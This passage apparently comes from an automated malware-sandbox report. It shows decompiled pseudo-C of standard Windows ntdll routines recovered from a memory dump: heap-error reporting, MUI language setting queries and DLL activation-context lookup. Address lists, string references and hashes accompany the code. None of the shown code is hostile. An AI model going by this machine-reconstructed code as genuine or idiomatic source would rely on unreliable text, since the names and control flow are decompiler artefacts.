				E04CDB150("Error code: %d - %s\n",  *0x4dc5898);
				_t113 =  *0x4dc58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04CDB150();
					} else {
						E04CDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04CDB150("Parameter1: %p\n",  *0x4dc58a4);
				}
				_t115 =  *0x4dc58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04CDB150();
					} else {
						E04CDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04CDB150("Parameter2: %p\n",  *0x4dc58a8);
				}
				_t117 =  *0x4dc58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04CDB150();
					} else {
						E04CDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04CDB150("Parameter3: %p\n",  *0x4dc58ac);
				}
				_t119 =  *0x4dc58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04CDB150();
					} else {
						E04CDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x4dc58b4);
					E04CDB150("Last known valid blocks: before - %p, after - %p\n",  *0x4dc58b0);
				} else {
					_t120 =  *0x4dc58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04CDB150();
				} else {
					E04CDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E04CDB150("Stack trace available at %p\n", 0x4dc58c0);
			}











                                                                                            0x04d91c10
                                                                                            0x04d91c16
                                                                                            0x04d91c1e
                                                                                            0x04d91c3d
                                                                                            0x04d91c3e
                                                                                            0x04d91c20
                                                                                            0x04d91c35
                                                                                            0x04d91c3a
                                                                                            0x04d91c44
                                                                                            0x04d91c55
                                                                                            0x04d91c5a
                                                                                            0x04d91c65
                                                                                            0x04d91c67
                                                                                            0x00000000
                                                                                            0x04d91c6e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d91c67
                                                                                            0x04d91cdc
                                                                                            0x04d91ce5
                                                                                            0x04d91d04
                                                                                            0x04d91d05
                                                                                            0x04d91ce7
                                                                                            0x04d91cfc
                                                                                            0x04d91d01
                                                                                            0x04d91d0b
                                                                                            0x04d91d17
                                                                                            0x04d91d1f
                                                                                            0x04d91d25
                                                                                            0x04d91d30
                                                                                            0x04d91d4f
                                                                                            0x04d91d50
                                                                                            0x04d91d32
                                                                                            0x04d91d47
                                                                                            0x04d91d4c
                                                                                            0x04d91d61
                                                                                            0x04d91d67
                                                                                            0x04d91d68
                                                                                            0x04d91d6e
                                                                                            0x04d91d79
                                                                                            0x04d91d98
                                                                                            0x04d91d99
                                                                                            0x04d91d7b
                                                                                            0x04d91d90
                                                                                            0x04d91d95
                                                                                            0x04d91daa
                                                                                            0x04d91db0
                                                                                            0x04d91db1
                                                                                            0x04d91db7
                                                                                            0x04d91dc2
                                                                                            0x04d91de1
                                                                                            0x04d91de2
                                                                                            0x04d91dc4
                                                                                            0x04d91dd9
                                                                                            0x04d91dde
                                                                                            0x04d91df3
                                                                                            0x04d91df9
                                                                                            0x04d91dfa
                                                                                            0x04d91e00
                                                                                            0x04d91e0a
                                                                                            0x04d91e13
                                                                                            0x04d91e32
                                                                                            0x04d91e33
                                                                                            0x04d91e15
                                                                                            0x04d91e2a
                                                                                            0x04d91e2f
                                                                                            0x04d91e39
                                                                                            0x04d91e4a
                                                                                            0x04d91e02
                                                                                            0x04d91e02
                                                                                            0x04d91e08
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d91e08
                                                                                            0x04d91e5b
                                                                                            0x04d91e7a
                                                                                            0x04d91e7b
                                                                                            0x04d91e5d
                                                                                            0x04d91e72
                                                                                            0x04d91e77
                                                                                            0x04d91e95

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                            • API String ID: 0-2897834094
                                                                                            • Opcode ID: 5f4030af24e3a2550159b7ccf1e112069b2257543878012826d62428028fb15b
                                                                                            • Instruction ID: 1ebe884b6e1e703b931113e66d99c1610a9e5100d72afdf302b152f39928eef2
                                                                                            • Opcode Fuzzy Hash: 5f4030af24e3a2550159b7ccf1e112069b2257543878012826d62428028fb15b
                                                                                            • Instruction Fuzzy Hash: 3C61D53A611157DFFB119B85D594E28B3F6EB05A31B0A807EF509DB304E638FC419E1A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CE3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 96%
                                                                                            			E04CE3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E04CE1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E04CE1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E04CE1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E04CE1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E04CE1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L04CF4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E04D1F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E04D21370(_t276, 0x4cb4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E04D1BB40(0,  &_v68, _t170);
									if(L04CE43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E04D1BB40(_t257,  &_v68, _t243);
								if(L04CE43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E04D21370(_t278, 0x4cb4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L04CF4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E04D1F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E04D21370(_v16, 0x4cb4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E04D1BB40(_t262,  &_v68, _t244);
								if(L04CE43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E04D21370(_t282, 0x4cb4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E04D1BB40(_t262,  &_v68, _t201);
							if(L04CE43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L04CF4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E04D1F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E04D21370(_t280, 0x4cb4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E04D1BB40(_t267,  &_v68, _t245);
							if(L04CE43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E04D21370(_t284, 0x4cb4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E04D1BB40(_t267,  &_v68, _t224);
						if(L04CE43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                                            0x04ce3d3c
                                                                                            0x04ce3d42
                                                                                            0x04ce3d44
                                                                                            0x04ce3d46
                                                                                            0x04ce3d49
                                                                                            0x04ce3d4c
                                                                                            0x04ce3d4f
                                                                                            0x04ce3d52
                                                                                            0x04ce3d55
                                                                                            0x04ce3d58
                                                                                            0x04ce3d5b
                                                                                            0x04ce3d5f
                                                                                            0x04ce3d61
                                                                                            0x04ce3d66
                                                                                            0x04d38213
                                                                                            0x04d38218
                                                                                            0x04ce4085
                                                                                            0x04ce4088
                                                                                            0x04ce408e
                                                                                            0x04ce4094
                                                                                            0x04ce409a
                                                                                            0x04ce40a0
                                                                                            0x04ce40a6
                                                                                            0x04ce40a9
                                                                                            0x04ce40af
                                                                                            0x04ce40b6
                                                                                            0x04ce40bd
                                                                                            0x04ce40bd
                                                                                            0x04ce3d83
                                                                                            0x04d3821f
                                                                                            0x04d38229
                                                                                            0x04d38238
                                                                                            0x04d38238
                                                                                            0x04d3823d
                                                                                            0x04d3823d
                                                                                            0x04ce3da0
                                                                                            0x04ce3daf
                                                                                            0x04ce3db5
                                                                                            0x04ce3dba
                                                                                            0x04ce3dba
                                                                                            0x04ce3dd4
                                                                                            0x04ce3e94
                                                                                            0x04ce3eab
                                                                                            0x04ce3f6d
                                                                                            0x04ce3f84
                                                                                            0x04ce406b
                                                                                            0x04ce406b
                                                                                            0x04ce406e
                                                                                            0x04ce406e
                                                                                            0x04ce4070
                                                                                            0x04ce4074
                                                                                            0x04d38351
                                                                                            0x04d38351
                                                                                            0x04ce407a
                                                                                            0x04ce407f
                                                                                            0x04d3835d
                                                                                            0x04d38370
                                                                                            0x04d38377
                                                                                            0x04d38379
                                                                                            0x04d3837c
                                                                                            0x04d3837c
                                                                                            0x04d3835d
                                                                                            0x00000000
                                                                                            0x04ce407f
                                                                                            0x04ce3f8a
                                                                                            0x04ce3f8d
                                                                                            0x04ce3f90
                                                                                            0x04ce3f95
                                                                                            0x04d3830d
                                                                                            0x04d3830f
                                                                                            0x04ce3f9b
                                                                                            0x04ce3fac
                                                                                            0x04ce3fae
                                                                                            0x04ce3fb1
                                                                                            0x04ce3fb1
                                                                                            0x04ce3fb6
                                                                                            0x04d38317
                                                                                            0x04d3831a
                                                                                            0x00000000
                                                                                            0x04ce3fbc
                                                                                            0x04ce3fc1
                                                                                            0x04ce3fc9
                                                                                            0x04ce3fd7
                                                                                            0x04ce3fda
                                                                                            0x04ce3fdd
                                                                                            0x04ce4021
                                                                                            0x04ce4021
                                                                                            0x04ce4029
                                                                                            0x04ce4030
                                                                                            0x04ce4044
                                                                                            0x04ce4046
                                                                                            0x04ce4046
                                                                                            0x04ce4044
                                                                                            0x04ce4049
                                                                                            0x04d38327
                                                                                            0x04d38334
                                                                                            0x04d38339
                                                                                            0x04d3833c
                                                                                            0x04ce404f
                                                                                            0x04ce404f
                                                                                            0x04ce404f
                                                                                            0x04ce4051
                                                                                            0x04ce4056
                                                                                            0x04ce4063
                                                                                            0x04ce4063
                                                                                            0x04ce4068
                                                                                            0x00000000
                                                                                            0x04ce4068
                                                                                            0x04ce3fdf
                                                                                            0x04ce3fe2
                                                                                            0x04ce3fe4
                                                                                            0x04ce3fe7
                                                                                            0x04ce3fef
                                                                                            0x04ce4003
                                                                                            0x04ce4005
                                                                                            0x04ce4005
                                                                                            0x04ce400c
                                                                                            0x04ce4013
                                                                                            0x04ce4016
                                                                                            0x04ce4017
                                                                                            0x04ce401b
                                                                                            0x04ce401e
                                                                                            0x00000000
                                                                                            0x04ce401e
                                                                                            0x04ce3fb6
                                                                                            0x04ce3eb1
                                                                                            0x04ce3eb4
                                                                                            0x04ce3eb7
                                                                                            0x04ce3ebc
                                                                                            0x04d382a9
                                                                                            0x04d382ab
                                                                                            0x04ce3ec2
                                                                                            0x04ce3ed3
                                                                                            0x04ce3ed5
                                                                                            0x04ce3ed8
                                                                                            0x04ce3ed8
                                                                                            0x04ce3edd
                                                                                            0x04d382b3
                                                                                            0x04d382b6
                                                                                            0x00000000
                                                                                            0x04ce3ee3
                                                                                            0x04ce3ee8
                                                                                            0x04ce3eed
                                                                                            0x04ce3ef0
                                                                                            0x04ce3ef3
                                                                                            0x04ce3f02
                                                                                            0x04ce3f05
                                                                                            0x04ce3f08
                                                                                            0x04d382c0
                                                                                            0x04d382c3
                                                                                            0x04d382c5
                                                                                            0x04d382c8
                                                                                            0x04d382d0
                                                                                            0x04d382e4
                                                                                            0x04d382e6
                                                                                            0x04d382e6
                                                                                            0x04d382ed
                                                                                            0x04d382f4
                                                                                            0x04d382f7
                                                                                            0x04d382f8
                                                                                            0x04d382fc
                                                                                            0x04d382ff
                                                                                            0x04d382ff
                                                                                            0x04ce3f0e
                                                                                            0x04ce3f11
                                                                                            0x04ce3f16
                                                                                            0x04ce3f1d
                                                                                            0x04ce3f31
                                                                                            0x04d38307
                                                                                            0x04d38307
                                                                                            0x04ce3f31
                                                                                            0x04ce3f39
                                                                                            0x04ce3f48
                                                                                            0x04ce3f4d
                                                                                            0x04ce3f50
                                                                                            0x04ce3f50
                                                                                            0x04ce3f53
                                                                                            0x04ce3f58
                                                                                            0x04ce3f65
                                                                                            0x04ce3f65
                                                                                            0x04ce3f6a
                                                                                            0x00000000
                                                                                            0x04ce3f6a
                                                                                            0x04ce3edd
                                                                                            0x04ce3dda
                                                                                            0x04ce3ddd
                                                                                            0x04ce3de0
                                                                                            0x04ce3de5
                                                                                            0x04d38245
                                                                                            0x04ce3deb
                                                                                            0x04ce3df7
                                                                                            0x04ce3dfc
                                                                                            0x04ce3dfe
                                                                                            0x04ce3e01
                                                                                            0x04ce3e01
                                                                                            0x04ce3e06
                                                                                            0x04d3824d
                                                                                            0x04d3824f
                                                                                            0x04d38254
                                                                                            0x00000000
                                                                                            0x04ce3e0c
                                                                                            0x04ce3e11
                                                                                            0x04ce3e16
                                                                                            0x04ce3e19
                                                                                            0x04ce3e29
                                                                                            0x04ce3e2c
                                                                                            0x04ce3e2f
                                                                                            0x04d3825c
                                                                                            0x04d3825f
                                                                                            0x04d38261
                                                                                            0x04d38264
                                                                                            0x04d3826c
                                                                                            0x04d38280
                                                                                            0x04d38282
                                                                                            0x04d38282
                                                                                            0x04d38289
                                                                                            0x04d38290
                                                                                            0x04d38293
                                                                                            0x04d38294
                                                                                            0x04d38298
                                                                                            0x04d3829b
                                                                                            0x04d3829b
                                                                                            0x04ce3e35
                                                                                            0x04ce3e38
                                                                                            0x04ce3e3d
                                                                                            0x04ce3e44
                                                                                            0x04ce3e58
                                                                                            0x04d382a3
                                                                                            0x04d382a3
                                                                                            0x04ce3e58
                                                                                            0x04ce3e60
                                                                                            0x04ce3e6f
                                                                                            0x04ce3e74
                                                                                            0x04ce3e77
                                                                                            0x04ce3e77
                                                                                            0x04ce3e7a
                                                                                            0x04ce3e7f
                                                                                            0x04ce3e8c
                                                                                            0x04ce3e8c
                                                                                            0x04ce3e91
                                                                                            0x00000000
                                                                                            0x04ce3e91

                                                                                            Strings
                                                                                            • Kernel-MUI-Language-Allowed, xrefs: 04CE3DC0
                                                                                            • WindowsExcludedProcs, xrefs: 04CE3D6F
                                                                                            • Kernel-MUI-Number-Allowed, xrefs: 04CE3D8C
                                                                                            • Kernel-MUI-Language-Disallowed, xrefs: 04CE3E97
                                                                                            • Kernel-MUI-Language-SKU, xrefs: 04CE3F70
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                            • API String ID: 0-258546922
                                                                                            • Opcode ID: e0848ff7e049e6451a93ac76fe6afb32d2f7ceea8eb62a9d36fe3ec88818202b
                                                                                            • Instruction ID: b87b44aab04dfdffb566b2994ca43413942899ec94452e766ae089c7352e0000
                                                                                            • Opcode Fuzzy Hash: e0848ff7e049e6451a93ac76fe6afb32d2f7ceea8eb62a9d36fe3ec88818202b
                                                                                            • Instruction Fuzzy Hash: 0CF14D72D00658EFDB15DF99C980AEEB7BAFF48754F14006AE905A7211E734BE01DBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D08E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 44%
                                                                                            			E04D08E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x4dcd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x4dc8464; // 0x74b10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x4dc5780 & 0x00000003) != 0) {
							E04D55510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x4dc5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E04D1B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x4dc7984; // 0xd02ab8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x4dc8464; // 0x74b10110
					 *0x4dcb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E04D09B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x4dc5780 & 0x00000005) != 0) {
						_push(_t49);
						E04D55510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                                            0x04d08e0f
                                                                                            0x04d08e16
                                                                                            0x04d08e19
                                                                                            0x04d08e1b
                                                                                            0x04d08e21
                                                                                            0x04d08e7f
                                                                                            0x04d08e85
                                                                                            0x04d49354
                                                                                            0x04d4936c
                                                                                            0x04d49371
                                                                                            0x04d4937b
                                                                                            0x04d49381
                                                                                            0x04d49381
                                                                                            0x04d4937b
                                                                                            0x04d08e9d
                                                                                            0x04d08e9d
                                                                                            0x04d08e29
                                                                                            0x04d08e2c
                                                                                            0x04d08e38
                                                                                            0x04d08e3e
                                                                                            0x04d08e43
                                                                                            0x04d08eb5
                                                                                            0x04d08eb9
                                                                                            0x04d492aa
                                                                                            0x04d492af
                                                                                            0x04d492e8
                                                                                            0x04d492e8
                                                                                            0x04d492af
                                                                                            0x04d08eb9
                                                                                            0x04d08e45
                                                                                            0x04d08e53
                                                                                            0x04d08e5b
                                                                                            0x04d08e5f
                                                                                            0x04d08e78
                                                                                            0x04d08e78
                                                                                            0x04d08e7d
                                                                                            0x04d08ec3
                                                                                            0x04d08ecd
                                                                                            0x04d08ed2
                                                                                            0x04d08ed2
                                                                                            0x04d08ec5
                                                                                            0x04d08ec5
                                                                                            0x00000000
                                                                                            0x04d08e7d
                                                                                            0x04d08e67
                                                                                            0x04d08ea4
                                                                                            0x04d4931a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d49320
                                                                                            0x04d08ea4
                                                                                            0x04d08e70
                                                                                            0x04d49325
                                                                                            0x04d49340
                                                                                            0x04d49345
                                                                                            0x04d49345
                                                                                            0x04d08e76
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000

                                                                                            Strings
                                                                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 04D49357
                                                                                            • LdrpFindDllActivationContext, xrefs: 04D49331, 04D4935D
                                                                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 04D4932A
                                                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 04D4933B, 04D49367
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                            • API String ID: 0-3779518884
                                                                                            • Opcode ID: bc0b8e7d2ea00865620ece9f8229f0eaabf6298bbc5124aecfb55089dc3a4fa7
                                                                                            • Instruction ID: 23e4fe8300f8024f8d47cf3e2685e05d6b171e77e6bf031ac882634b808720ee
                                                                                            • Opcode Fuzzy Hash: bc0b8e7d2ea00865620ece9f8229f0eaabf6298bbc5124aecfb55089dc3a4fa7
                                                                                            • Instruction Fuzzy Hash: 46410332B00316AFDF21BE18C89DB76B6A5FB44754F05C16AF885571D1EB72BC80A6C1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CE8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 83%
                                                                                            			E04CE8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
